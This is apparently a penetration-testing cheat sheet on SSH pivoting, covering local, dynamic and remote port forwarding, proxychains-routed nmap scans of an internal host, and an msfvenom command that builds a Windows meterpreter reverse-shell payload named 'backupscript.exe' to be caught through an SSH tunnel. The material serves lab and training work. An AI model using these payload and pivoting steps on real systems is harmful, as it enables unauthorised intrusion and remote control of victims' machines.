# SSH

## Local port forwarding

```bash
ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64
```

The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `1234` to `localhost:3306` on the Ubuntu server.

### **Confirming Port Forward with Netstat**

```bash
netstat -antp | grep 1234
```

## Dynamic port forwarding

```bash
ssh -D 1080 ubuntu@10.129.202.64
```

The `-D` argument requests the SSH server to enable dynamic port forwarding. Once we have this enabled, we will require a tool that can route any tool's packets over port `9050`.

{% hint style="info" %}
To inform proxychains that we must use port 1080, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks5 127.0.0.1` 1080 to the last line if it is not already there.
{% endhint %}

### Nmap

{% hint style="info" %}
One more important note to remember here is that we can only perform a `full TCP connect scan` over proxychains. 
{% endhint %}

```bash
proxychains nmap -v -Pn -sT 172.16.5.19
```

## Setting up remote/reverse port forwarding through SSH

### Payload - listener sent to InteralIPofPivotHost:8080

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
```

### SSH remote port forward - InteralIPofPivotHost:8080 --> 8000

```
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
```

### Local listener on port 0.0.0.0:8000&#x20;

Use multi/handler LPORT 8000